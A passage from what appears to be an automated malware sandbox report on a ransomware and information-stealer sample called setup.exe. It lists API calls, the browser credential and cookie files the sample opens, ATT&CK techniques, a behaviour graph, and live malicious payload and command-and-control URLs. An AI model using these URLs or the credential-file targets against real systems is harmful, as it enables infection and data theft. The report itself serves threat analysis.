leinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,6_2_00410C7F
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeCode function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,6_2_00415420
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,6_2_004118DB
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,6_2_00409CEA
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,6_2_004154FA
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,6_2_0041089B
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,6_2_004124A4
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,6_2_00412675
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeCode function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,6_2_0041568A
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,6_2_004122AD
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,6_2_00412735
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,6_2_00411BC9
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,6_2_004127D8
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,6_2_0041279C
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,6_2_004123A2
        Source: C:\Users\user\AppData\Local\b08c7f77-c434-4f27-865a-c3b110e4a9c0\setup.exeCode function: GetLocaleInfoA,6_2_004157BF
        Source: C:\Users\user\Desktop\setup.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,7_2_0043404A
        Source: C:\Users\user\Desktop\setup.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,7_2_00438178
        Source: C:\Users\user\Desktop\setup.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,7_2_00440116
        Source: C:\Users\user\Desktop\setup.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,7_2_004382A2
        Source: C:\Users\user\Desktop\setup.exeCode function: GetLocaleInfoW,_GetPrimaryLen,7_2_0043834F
        Source: C:\Users\user\Desktop\setup.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,7_2_00438423
        Source: C:\Users\user\Desktop\setup.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,7_2_004335E7
        Source: C:\Users\user\Desktop\setup.exeCode function: EnumSystemLocalesW,7_2_004387C8
        Source: C:\Users\user\Desktop\setup.exeCode function: GetLocaleInfoW,7_2_0043884E
        Source: C:\Users\user\Desktop\setup.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,7_2_00432B6D
        Source: C:\Users\user\Desktop\setup.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,7_2_00437BB3
        Source: C:\Users\user\Desktop\setup.exeCode function: EnumSystemLocalesW,7_2_00437E27
        Source: C:\Users\user\Desktop\setup.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,7_2_00437E83
        Source: C:\Users\user\Desktop\setup.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,7_2_00437F00
        Source: C:\Users\user\Desktop\setup.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,7_2_0042BF17
        Source: C:\Users\user\Desktop\setup.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,7_2_00437F83
        Source: C:\Users\user\Desktop\setup.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,7_2_00432FAD
        Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0040FBCF GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_0040FBCF
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,2_2_00419F90
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_0042FE47 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,2_2_0042FE47
        Source: C:\Users\user\Desktop\setup.exeCode function: 2_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,2_2_00419F90
        Source: C:\Users\user\Desktop\setup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Stealing of Sensitive Information

        barindex
        Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\times.jsonJump to behavior
        Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\xulstore.jsonJump to behavior
        Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\sessionstore.jsonlz4Jump to behavior
        Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\targeting.snapshot.jsonJump to behavior
        Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.dbJump to behavior
        Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\0absryc3.default\times.jsonJump to behavior
        Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\containers.jsonJump to behavior
        Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\protections.sqliteJump to behavior
        Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\webappsstore.sqlite-shmJump to behavior
        Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\extension-preferences.jsonJump to behavior
        Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\handlers.jsonJump to behavior
        Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\sessionCheckpoints.jsonJump to behavior
        Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\search.json.mozlz4Jump to behavior
        Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\ExperimentStoreData.jsonJump to behavior
        Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\webappsstore.sqliteJump to behavior
        Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\webappsstore.sqlite-walJump to behavior
        Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
        Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-shmJump to behavior
        Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-shmJump to behavior
        Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
        Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\favicons.sqliteJump to behavior
        Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\pkcs11.txtJump to behavior
        Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Google Profile.icoJump to behavior
        Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\addonStartup.json.lz4Jump to behavior
        Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\AlternateServices.txtJump to behavior
        Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\parent.lockJump to behavior
        Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\permissions.sqliteJump to behavior
        Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite-walJump to behavior
        Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-walJump to behavior
        Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\favicons.sqlite-walJump to behavior
        Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\content-prefs.sqliteJump to behavior
        Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.jsJump to behavior
        Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\SiteSecurityServiceState.txtJump to behavior
        Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.dbJump to behavior
        Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage.sqliteJump to behavior
        Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\shield-preference-experiments.jsonJump to behavior
        Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\addons.jsonJump to behavior
        Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
        Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\2o7hffxt.default-release\favicons.sqlite-shmJump to behavior
        Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db-journalJump to behavior
        Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\LOG.oldJump to behavior
        Source: C:\Users\user\Desktop\setup.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\trusted_vault.pbJump to behavior
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts3
        Native API
        1
        DLL Side-Loading
        1
        Exploitation for Privilege Escalation
        1
        Deobfuscate/Decode Files or Information
        1
        OS Credential Dumping
        2
        System Time Discovery
        1
        Taint Shared Content
        11
        Archive Collected Data
        2
        Ingress Tool Transfer
        Exfiltration Over Other Network Medium2
        Data Encrypted for Impact
        CredentialsDomainsDefault Accounts3
        Command and Scripting Interpreter
        1
        Registry Run Keys / Startup Folder
        1
        DLL Side-Loading
        2
        Obfuscated Files or Information
        LSASS Memory1
        Account Discovery
        Remote Desktop Protocol1
        Data from Local System
        21
        Encrypted Channel
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAt1
        Services File Permissions Weakness
        211
        Process Injection
        21
        Software Packing
        Security Account Manager3
        File and Directory Discovery
        SMB/Windows Admin Shares1
        Screen Capture
        2
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
        Registry Run Keys / Startup Folder
        1
        DLL Side-Loading
        NTDS24
        System Information Discovery
        Distributed Component Object ModelInput Capture13
        Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
        Services File Permissions Weakness
        1
        Masquerading
        LSA Secrets1
        Query Registry
        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
        Virtualization/Sandbox Evasion
        Cached Domain Credentials51
        Security Software Discovery
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items211
        Process Injection
        DCSync21
        Virtualization/Sandbox Evasion
        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
        Services File Permissions Weakness
        Proc Filesystem2
        Process Discovery
        Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
        System Owner/User Discovery
        Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
        System Network Configuration Discovery
        Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1484407 Sample: setup.exe Startdate: 30/07/2024 Architecture: WINDOWS Score: 100 48 zexeq.com 2->48 50 uaery.top 2->50 52 api.2ip.ua 2->52 64 Found malware configuration 2->64 66 Malicious sample detected (through community Yara rule) 2->66 68 Antivirus detection for URL or domain 2->68 70 6 other signatures 2->70 9 setup.exe 2->9         started        12 setup.exe 2->12         started        14 setup.exe 2->14         started        16 3 other processes 2->16 signatures3 process4 signatures5 72 Detected unpacking (changes PE section rights) 9->72 74 Detected unpacking (overwrites its own PE header) 9->74 76 Creates HTML files with .exe extension (expired dropper behavior) 9->76 80 4 other signatures 9->80 18 setup.exe 1 17 9->18         started        78 Injects a PE file into a foreign processes 14->78 22 setup.exe 14->22         started        24 setup.exe 16->24         started        process6 dnsIp7 54 api.2ip.ua 188.114.96.3, 443, 49711, 49712 CLOUDFLARENETUS European Union 18->54 44 C:\Users\user\...\setup.exe:Zone.Identifier, ASCII 18->44 dropped 46 C:\Users\user\AppData\Local\...\setup.exe, MS-DOS 18->46 dropped 26 setup.exe 18->26         started        29 icacls.exe 18->29         started        file8 process9 signatures10 82 Injects a PE file into a foreign processes 26->82 31 setup.exe 1 31 26->31         started        process11 dnsIp12 56 zexeq.com 188.40.141.211, 49713, 49714, 80 HETZNER-ASDE Germany 31->56 36 C:\Users\user\...\setup.exe.qapo (copy), MS-DOS 31->36 dropped 38 C:\Users\...\userdict_v1.0809.dat.qapo (copy), data 31->38 dropped 40 C:\Users\...\DefaultLayouts.xml.qapo (copy), data 31->40 dropped 42 105 other files (104 malicious) 31->42 dropped 58 Tries to harvest and steal browser information (history, passwords, etc) 31->58 60 Infects executable files (exe, dll, sys, html) 31->60 62 Modifies existing user documents (likely ransomware behavior) 31->62 file13 signatures14

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        setup.exe89%ReversingLabsWin32.Trojan.Lockbit
        setup.exe100%Joe Sandbox ML
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        http://www.openssl.org/support/faq.html0%URL Reputationsafe
        https://substrate.office.com0%URL Reputationsafe
        http://www.youtube.com/0%URL Reputationsafe
        http://zexeq.com/test2/get.phper100%Avira URL Cloudmalware
        http://www.amazon.com/0%Avira URL Cloudsafe
        https://api.2ip.ua/0%Avira URL Cloudsafe
        https://api.2ip.ua/geo.jsonl0%Avira URL Cloudsafe
        https://we.tl/t-zUVSNg4K;0%Avira URL Cloudsafe
        http://uaery.top/dl/build2.exee0%Avira URL Cloudsafe
        https://we.tl/t-zUVSNg4K0%Avira URL Cloudsafe
        http://zexeq.com/files/1/build3.exe$runpayinstall010921_delay_800_sec.exe2EE100%Avira URL Cloudmalware
        http://www.nytimes.com/0%Avira URL Cloudsafe
        https://opendgame.ddns.net/endgame0%Avira URL Cloudsafe
        http://zexeq.com/files/1/build3.exe$run100%Avira URL Cloudmalware
        https://we.tl/t-zUVSNg4KRZ0%Avira URL Cloudsafe
        https://api.2ip.ua/geo.json0%Avira URL Cloudsafe
        http://uaery.top/dl/build2.exe$run0%Avira URL Cloudsafe
        https://api.2ip.ua/geo.jsony0%Avira URL Cloudsafe
        https://api.2ip.ua/~S0%Avira URL Cloudsafe
        http://www.twitter.com/0%Avira URL Cloudsafe
        http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error0%Avira URL Cloudsafe
        https://api.2ip.ua/geo.json:0%Avira URL Cloudsafe
        https://api.2ip.ua/geo.jsonb0%Avira URL Cloudsafe
        http://zexeq.com/files/1/build3.exe$runpayinstall010921_delay_800_sec.exe2100%Avira URL Cloudmalware
        http://www.reddit.com/0%Avira URL Cloudsafe
        http://uaery.top/dl/build2.exeA0%Avira URL Cloudsafe
        http://zexeq.com/files/1/build3.exe9100%Avira URL Cloudmalware
        http://www.live.com/0%Avira URL Cloudsafe
        https://api.2ip.ua/geo.jsonp0%Avira URL Cloudsafe
        http://zexeq.com/test2/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4&first=trueL100%Avira URL Cloudmalware
        https://api.2ip.ua/m0%Avira URL Cloudsafe
        http://zexeq.com/files/1/build3.exe100%Avira URL Cloudmalware
        http://www.wikipedia.com/0%Avira URL Cloudsafe
        http://zexeq.com/test2/get.php100%Avira URL Cloudmalware
        http://zexeq.com/test2/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4&first=truea100%Avira URL Cloudmalware
        http://www.google.com/0%Avira URL Cloudsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        api.2ip.ua
        188.114.96.3
        truefalse
          unknown
          zexeq.com
          188.40.141.211
          truetrue
            unknown
            uaery.top
            unknown
            unknowntrue
              unknown
              NameMaliciousAntivirus DetectionReputation
              https://api.2ip.ua/geo.jsonfalse
              • Avira URL Cloud: safe
              unknown
              http://zexeq.com/test2/get.phptrue
              • Avira URL Cloud: malware
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              http://www.nytimes.com/setup.exe, 00000007.00000003.2375877221.0000000003580000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://opendgame.ddns.net/endgamesetup.exe, 00000007.00000002.2791061138.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000003.2376242273.0000000003580000.00000004.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://api.2ip.ua/setup.exe, 00000002.00000002.2117422430.0000000000785000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000007.00000002.2789751270.000000000062A000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 0000000C.00000002.2256293497.00000000007D3000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 0000000C.00000002.2256293497.000000000076A000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000011.00000002.2337567990.000000000093B000.00000004.00000020.00020000.00000000.sdmp, setup.exe, 00000011.00000002.2337567990.0000000000919000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://we.tl/t-zUVSNg4K;setup.exe, 00000007.00000002.2791061138.00000000030FC000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://zexeq.com/files/1/build3.exe$runpayinstall010921_delay_800_sec.exe2EEsetup.exe, 00000007.00000002.2789751270.0000000000671000.00000004.00000020.00020000.00000000.sdmpfalse
